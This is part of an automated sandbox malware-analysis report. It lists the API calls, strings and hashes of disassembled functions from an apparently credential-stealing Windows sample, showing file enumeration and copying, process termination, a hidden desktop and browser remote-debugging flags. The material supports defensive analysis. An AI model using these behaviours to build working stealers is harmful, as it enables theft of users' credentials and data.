                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: 32e0f642b7fce03cfc04e896de69c76fae3e55e340c9f660098ee71d0d64a45c
                            • Instruction ID: b5f32ce9e3a51c22ff92aa0328d56a384fabea90f7f07bbe74ebb7b584135d59
                            • Opcode Fuzzy Hash: 32e0f642b7fce03cfc04e896de69c76fae3e55e340c9f660098ee71d0d64a45c
                            • Instruction Fuzzy Hash: 6312867561160A9BCB24EF7CD849AAE77B8EF44300F08862DF84AD7250EB74DD458BB0
                            Function 00D7CBE0 Relevance: 54.6, APIs: 27, Strings: 4, Instructions: 310filestringCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00D7CBFC
                            • FindFirstFileA.KERNEL32(?,?), ref: 00D7CC13
                            • lstrcat.KERNEL32(?,?), ref: 00D7CC5F
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7CC71
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D7CC8B
                            • wsprintfA.USER32 ref: 00D7CCB0
                            • PathMatchSpecA.SHLWAPI(?,00BF8F60), ref: 00D7CCE2
                            • CoInitialize.OLE32(00000000), ref: 00D7CCEE
                              • Part of subcall function 00D7CAE0: CoCreateInstance.COMBASE(00D8B110,00000000,00000001,00D8B100,?), ref: 00D7CB06
                              • Part of subcall function 00D7CAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00D7CB46
                              • Part of subcall function 00D7CAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 00D7CBC9
                            • CoUninitialize.COMBASE ref: 00D7CD09
                            • lstrcat.KERNEL32(?,?), ref: 00D7CD2E
                            • lstrlen.KERNEL32(?), ref: 00D7CD3B
                            • StrCmpCA.SHLWAPI(?,00D8CFEC), ref: 00D7CD55
                            • wsprintfA.USER32 ref: 00D7CD7D
                            • wsprintfA.USER32 ref: 00D7CD9C
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 00D7CDB0
                            • wsprintfA.USER32 ref: 00D7CDD8
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00D7CDF1
                            • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00D7CE10
                            • GetFileSizeEx.KERNEL32(00000000,?), ref: 00D7CE28
                            • CloseHandle.KERNEL32(00000000), ref: 00D7CE33
                            • CloseHandle.KERNEL32(00000000), ref: 00D7CE3F
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D7CE54
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7CE94
                            • FindNextFileA.KERNEL32(?,?), ref: 00D7CF8D
                            • FindClose.KERNEL32(?), ref: 00D7CF9F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                            • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                            • API String ID: 3860919712-2388001722
                            • Opcode ID: 83a91bc5ac624948f0e79eaa0469b9549e74f1077c30ee953f3da62f8556bb73
                            • Instruction ID: a915a94562ce12211064c828d3b7d79af4b9a3200f51593e42f3329179565463
                            • Opcode Fuzzy Hash: 83a91bc5ac624948f0e79eaa0469b9549e74f1077c30ee953f3da62f8556bb73
                            • Instruction Fuzzy Hash: FBC171719102199FDB20DF64DC49EEE7779EF88304F049599F909A7190EA70AA45CF70
                            Function 00D71269 Relevance: 43.8, APIs: 29, Instructions: 336stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D71291
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D712B4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D712BF
                            • lstrlen.KERNEL32(00D94CA8), ref: 00D712CA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D712E7
                            • lstrcat.KERNEL32(00000000,00D94CA8), ref: 00D712F3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7131E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00D7133A
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7135C
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D71376
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D713AF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D713D7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D713E2
                            • lstrlen.KERNEL32(00D91794), ref: 00D713ED
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7140A
                            • lstrcat.KERNEL32(00000000,00D91794), ref: 00D71416
                            • lstrlen.KERNEL32(?), ref: 00D71423
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71443
                            • lstrcat.KERNEL32(00000000,?), ref: 00D71451
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D7147A
                            • StrCmpCA.SHLWAPI(?,00BFCF90), ref: 00D714A3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D714E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7150D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D71535
                            • StrCmpCA.SHLWAPI(?,00BFDA00), ref: 00D71552
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D71593
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D715BC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D715E4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D71796
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D717BE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D717F5
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D7181C
                            • FindClose.KERNEL32(00000000), ref: 00D7182B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                            • String ID:
                            • API String ID: 1346933759-0
                            • Opcode ID: dc9d1676466e2f3176be46920d8bb14a5e55bbd139126e301a824a58adc41fcf
                            • Instruction ID: e662dac007551e7b264ed9c00e23629becc58d3a327aff3c89edd2be6c5a2cea
                            • Opcode Fuzzy Hash: dc9d1676466e2f3176be46920d8bb14a5e55bbd139126e301a824a58adc41fcf
                            • Instruction Fuzzy Hash: 3CC16335A1160A9BCB21EF78DC89AAE77B8EF44304F084529F84AD7251EB74DD458BB0
                            Function 00D69770 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 234stringsleepCOMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 00D69790
                            • lstrcat.KERNEL32(?,?), ref: 00D697A0
                            • lstrcat.KERNEL32(?,?), ref: 00D697B1
                            • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 00D697C3
                            • memset.MSVCRT ref: 00D697D7
                              • Part of subcall function 00D83E70: lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D83EA5
                              • Part of subcall function 00D83E70: lstrcpy.KERNEL32(00000000,00BFA558), ref: 00D83ECF
                              • Part of subcall function 00D83E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,00D6134E,?,0000001A), ref: 00D83ED9
                            • wsprintfA.USER32 ref: 00D69806
                            • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 00D69827
                            • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 00D69844
                              • Part of subcall function 00D846A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00D846B9
                              • Part of subcall function 00D846A0: Process32First.KERNEL32(00000000,00000128), ref: 00D846C9
                              • Part of subcall function 00D846A0: Process32Next.KERNEL32(00000000,00000128), ref: 00D846DB
                              • Part of subcall function 00D846A0: StrCmpCA.SHLWAPI(?,?), ref: 00D846ED
                              • Part of subcall function 00D846A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D84702
                              • Part of subcall function 00D846A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00D84711
                              • Part of subcall function 00D846A0: CloseHandle.KERNEL32(00000000), ref: 00D84718
                              • Part of subcall function 00D846A0: Process32Next.KERNEL32(00000000,00000128), ref: 00D84726
                              • Part of subcall function 00D846A0: CloseHandle.KERNEL32(00000000), ref: 00D84731
                            • lstrcat.KERNEL32(00000000,?), ref: 00D69878
                            • lstrcat.KERNEL32(00000000,?), ref: 00D69889
                            • lstrcat.KERNEL32(00000000,00D94B60), ref: 00D6989B
                            • memset.MSVCRT ref: 00D698AF
                            • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00D698D4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D69903
                            • StrStrA.SHLWAPI(00000000,00BFDEF8), ref: 00D69919
                            • lstrcpyn.KERNEL32(00F993D0,00000000,00000000), ref: 00D69938
                            • lstrlen.KERNEL32(?), ref: 00D6994B
                            • wsprintfA.USER32 ref: 00D6995B
                            • lstrcpy.KERNEL32(?,00000000), ref: 00D69971
                            • Sleep.KERNEL32(00001388), ref: 00D699E7
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61557
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61579
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D6159B
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D615FF
                              • Part of subcall function 00D692B0: strlen.MSVCRT ref: 00D692E1
                              • Part of subcall function 00D692B0: strlen.MSVCRT ref: 00D692FA
                              • Part of subcall function 00D692B0: strlen.MSVCRT ref: 00D69399
                              • Part of subcall function 00D692B0: strlen.MSVCRT ref: 00D693E6
                              • Part of subcall function 00D84740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00D84759
                              • Part of subcall function 00D84740: Process32First.KERNEL32(00000000,00000128), ref: 00D84769
                              • Part of subcall function 00D84740: Process32Next.KERNEL32(00000000,00000128), ref: 00D8477B
                              • Part of subcall function 00D84740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D8479C
                              • Part of subcall function 00D84740: TerminateProcess.KERNEL32(00000000,00000000), ref: 00D847AB
                              • Part of subcall function 00D84740: CloseHandle.KERNEL32(00000000), ref: 00D847B2
                              • Part of subcall function 00D84740: Process32Next.KERNEL32(00000000,00000128), ref: 00D847C0
                              • Part of subcall function 00D84740: CloseHandle.KERNEL32(00000000), ref: 00D847CB
                            • CloseDesktop.USER32(?), ref: 00D69A1C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                            • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                            • API String ID: 958055206-1862457068
                            • Opcode ID: 946720ebc975939d91f40c2e19ebf88e7a51131cc3c53e603713d8fd7a85d54c
                            • Instruction ID: 53c8cbce9d1c93daaf4617956345799ab8519771655808d879ee870251dba837
                            • Opcode Fuzzy Hash: 946720ebc975939d91f40c2e19ebf88e7a51131cc3c53e603713d8fd7a85d54c
                            • Instruction Fuzzy Hash: B0914271A50208AFDB10DFB4DC85FEE77B8EF48700F144199F609A7191DBB1AA458BB0
                            Function 00D7E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00D7E22C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00D7E243
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7E263
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D7E27D
                            • wsprintfA.USER32 ref: 00D7E2A2
                            • StrCmpCA.SHLWAPI(?,00D8CFEC), ref: 00D7E2B4
                            • wsprintfA.USER32 ref: 00D7E2D1
                              • Part of subcall function 00D7EDE0: lstrcpy.KERNEL32(00000000,?), ref: 00D7EE12
                            • wsprintfA.USER32 ref: 00D7E2F0
                            • PathMatchSpecA.SHLWAPI(?,?), ref: 00D7E304
                            • lstrcat.KERNEL32(?,00BFE8D0), ref: 00D7E335
                            • lstrcat.KERNEL32(?,00D91794), ref: 00D7E347
                            • lstrcat.KERNEL32(?,?), ref: 00D7E358
                            • lstrcat.KERNEL32(?,00D91794), ref: 00D7E36A
                            • lstrcat.KERNEL32(?,?), ref: 00D7E37E
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00D7E394
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E3D2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7E422
                            • DeleteFileA.KERNEL32(?), ref: 00D7E45C
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61557
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61579
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D6159B
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D615FF
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D7E49B
                            • FindClose.KERNEL32(00000000), ref: 00D7E4AA
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                            • String ID: %s\%s$%s\*
                            • API String ID: 1375681507-2848263008
                            • Opcode ID: d31e94b9cb4ec5f1a85e0abe7a361e51dd98b612d86b86ab2542736aebacdce5
                            • Instruction ID: bdb77b335cb0022d62abc581bb50d318b0e3affff30603314e85d65e63c64e6c
                            • Opcode Fuzzy Hash: d31e94b9cb4ec5f1a85e0abe7a361e51dd98b612d86b86ab2542736aebacdce5
                            • Instruction Fuzzy Hash: 0E81707190021D9BCB20EFB4DC49AEE77B8FF48304F048999B51A93151EB75AA49CFB0
                            Function 00D616B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D616E2
                            • lstrcpy.KERNEL32(00000000,00D8CFEC), ref: 00D61719
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D6176C
                            • lstrcat.KERNEL32(00000000), ref: 00D61776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00D617A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D618F3
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00D618FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831744250.0000000000FAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000113C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.0000000001247000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000124F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831758033.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832014768.000000000125F000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832134493.0000000001406000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1832149401.0000000001407000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d60000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat
                            • String ID: \*.*
                            • API String ID: 2276651480-1173974218
                            • Opcode ID: 2340130c0b3d6091cfa82fa92a006eb77b49723325eedd6928d26a404f22a3df
                            • Instruction ID: 16497eb8ec85d4e58a6cec87f3a45126e1e68393bf6164fc489f6c11ed62dc74
                            • Opcode Fuzzy Hash: 2340130c0b3d6091cfa82fa92a006eb77b49723325eedd6928d26a404f22a3df
                            • Instruction Fuzzy Hash: FC818D3995160ADBCB21EFA8D899ABE77B8EF44301F0C012AF815A7251DB709D45CFB1
                            Function 00D7DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00D7DD45
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00D7DD4C
                            • wsprintfA.USER32 ref: 00D7DD62
                            • FindFirstFileA.KERNEL32(?,?), ref: 00D7DD79
                            • StrCmpCA.SHLWAPI(?,00D917A0), ref: 00D7DD9C
                            • StrCmpCA.SHLWAPI(?,00D917A4), ref: 00D7DDB6
                            • wsprintfA.USER32 ref: 00D7DDD4
                            • DeleteFileA.KERNEL32(?), ref: 00D7DE20
                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00D7DDED
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61557
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D61579
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D6159B
                              • Part of subcall function 00D61530: lstrcpy.KERNEL32(00000000,?), ref: 00D615FF
                              • Part of subcall function 00D7D980: memset.MSVCRT ref: 00D7D9A1
                              • Part of subcall function 00D7D980: memset.MSVCRT ref: 00D7D9B3
                              • Part of subcall function 00D7D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00D7D9DB
                              • Part of subcall function 00D7D980: lstrcpy.KERNEL32(00000000,?), ref: 00D7DA0E
                              • Part of subcall function 00D7D980: lstrcat.KERNEL32(?,00000000), ref: 00D7DA1C
                              • Part of subcall function 00D7D980: lstrcat.KERNEL32(?,00BFE1C8), ref: 00D7DA36
                              • Part of subcall function 00D7D980: lstrcat.KERNEL32(?,?), ref: 00D7DA4A
                              • Part of subcall function 00D7D980: lstrcat.KERNEL32(?,00BFCD80), ref: 00D7DA5E
                              • Part of subcall function 00D7D980: lstrcpy.KERNEL32(00000000,?), ref: 00D7DA8E
                              • Part of subcall function 00D7D980: GetFileAttributesA.KERNEL32(00000000), ref: 00D7DA95
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00D7DE2E
                            • FindClose.KERNEL32(00000000), ref: 00D7DE3D
                            • lstrcat.KERNEL32(?,00BFE8D0), ref: 00D7DE66
                            • lstrcat.KERNEL32(?,00BFD9A0), ref: 00D7DE7A
                            • lstrlen.KERNEL32(?), ref: 00D7DE84
                            • lstrlen.KERNEL32(?), ref: 00D7DE92
                            • lstrcpy.KERNEL32(00000000,?), ref: 00D7DED2
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1831572418.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                            • Associated: 00000000.00000002.1831559931.0000000000D60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000E0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1831572418.0000000000F98000.00000040.00000001.01000000.00000003.sdmpDownload File
